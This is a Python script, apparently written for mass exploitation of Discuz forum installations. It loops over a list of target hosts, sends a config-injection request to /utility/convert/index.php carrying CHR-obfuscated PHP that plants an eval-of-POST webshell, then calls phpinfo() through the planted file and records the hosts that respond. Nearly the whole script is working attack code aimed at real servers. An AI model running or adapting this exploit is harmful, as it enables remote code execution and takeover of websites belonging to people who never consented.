import requests

# 定义输入和输出文件
input_file = r'C:\Users\lenovo\Desktop\漏洞挖掘\Discuz\shell_url.txt'
output_file = 'filtered_urls.txt'

data = {
    'a': 'config',
    'source': 'd7.2_x1.5',
    'submit': 'yes',
    'newconfig[aaa\n\neval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(108).CHR(97).CHR(110).CHR(118).CHR(110).CHR(97).CHR(108).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//': 'aaaa'
}
# 读取每一行URL
with open(input_file, 'r') as file:
    urls = file.readlines()

# 遍历每个URL
for url in urls:
    url = url.strip()  # 去掉首尾空白字符
    if not url:
        continue  # 跳过空行
    url="http://"+url
    # 在/aa.php路由下使用POST请求提交数据

    response_post = requests.post(f'{url}/utility/convert/index.php', data=data,verify=False)  # 替换为你需要提交的数据
    # response_post.raise_for_status()  # 检查请求是否成功
    # print(response_post.text)
        # 访问/bb.php路由
    response_get = requests.post(f'{url}/utility/convert/data/config.inc.php',data={'46518': 'phpinfo();'},verify=False)
    # response_get.raise_for_status()  # 检查请求是否成功
    print(response_get.text)
    #
    #     # 检查响应体中是否存在'php'关键字
    if 'php' in response_get.text:
        with open(output_file, 'a') as out_file:
            out_file.write(url + '\n')  # 保存符合条件的URL

